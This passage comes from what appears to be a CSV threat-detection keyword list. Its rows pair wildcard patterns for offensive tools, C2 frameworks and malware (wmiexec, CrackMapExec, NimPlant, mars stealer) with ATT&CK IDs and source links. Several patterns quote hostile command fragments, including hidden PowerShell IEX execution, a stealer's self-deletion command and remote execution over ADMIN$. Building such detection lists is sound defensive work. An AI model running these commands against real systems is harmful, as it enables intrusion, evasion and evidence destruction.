performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*cmd.exe /c sc start plumber*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*,offensive_tool_keyword,mars stealer,Self-removal 'mars stealer' command,T1587,TA0002,mars stealer,,Malware,https://3xp0rt.com/posts/mars-stealer,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /C wmic /node:* /user:* /password:* os get caption*,greyware_tool_keyword,wmic,gather information about Windows OS version and licensing on the hosts,T1047 - T1016 - T1082,TA0007 - TA0002 - TA0005,N/A,N/A,Discovery,https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/,1,0,greyware tool - risks of False positive !,6,9,N/A,N/A,N/A,N/A -*cmd.exe /c zoom1.msi*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c /start /min powershell.exe -nop -c*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*,offensive_tool_keyword,wmiexec,wmiexec.py from impacket used by metasploit,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmd.exe /Q /c start *stage1.exe 1*,offensive_tool_keyword,malware,Destructive Malware targeting organizations,T1486 T1059,TA0008,N/A,N/A,Ransomware,https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe*\TEMP\ScreenConnect\*.cmd*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cmd/backdoor.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*cmd/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cmd/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cmd/localrelay*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cmd/merlinagent/*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*cmd/merlinagentdll/*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*cmd/setuid.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*cmd_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*cmd_powershell.cpp*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*cmd_shellcodex64.*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*cmd_shellcodex86.*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Cmd-Execute-Assembly.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Cmd-Inline-Execute.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*cmdinspector OFF*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*cmdinspector ON*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*cmdshell *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Cmd-Shinject.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Cmd-Upload.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*cme -d * -*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme -d *localhost*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme*-macOS-latest-*,offensive_tool_keyword,crackmapexec,macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme*-ubuntu-latest-*,offensive_tool_keyword,crackmapexec,ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme*-windows-latest-*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme/cme.conf*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme_bloodhound_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_dfscoerce_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_get-desc-users_pass_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_get-desc-users_pass_results*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_gpp_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_ldap-checker_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_MachineAccountQuota_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_ms17-010_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_mssql_priv_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_ntlmv1_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_passpol_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_petitpotam_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_printnightmare_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_runasppl_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_shadowcoerce_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_smb_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_smbsigning_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_subnets_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_trusted-for-delegation_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_users_auth_ldap_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_users_auth_smb_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_users_nullsess_smb_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_webdav_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme_zerologon_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cme-macOS-latest-*.zip*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme-ubuntu-latest-*.zip*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cme-windows-latest-*.zip*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cmpivot.py*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*cms400net_default_userpass*,offensive_tool_keyword,metasploit,Metasploit is a 